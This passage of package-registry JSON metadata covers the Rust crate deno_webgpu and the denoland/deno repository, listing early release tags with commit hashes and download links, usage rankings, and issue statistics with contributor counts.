ositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T14:54:28.910Z","dependent_packages_count":9,"downloads":518140,"downloads_period":"total","dependent_repos_count":34,"rankings":{"downloads":6.3665864754067645,"dependent_repos_count":4.930496198659409,"dependent_packages_count":4.227389948422694,"stargazers_count":1.0762116749481005,"forks_count":1.3699964775801725,"docker_downloads_count":3.2619210090208988,"average":3.53876696400634},"purl":"pkg:cargo/deno_webgpu","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_webgpu","docker_dependents_count":29,"docker_downloads_count":23282367,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_webgpu","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_webgpu/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste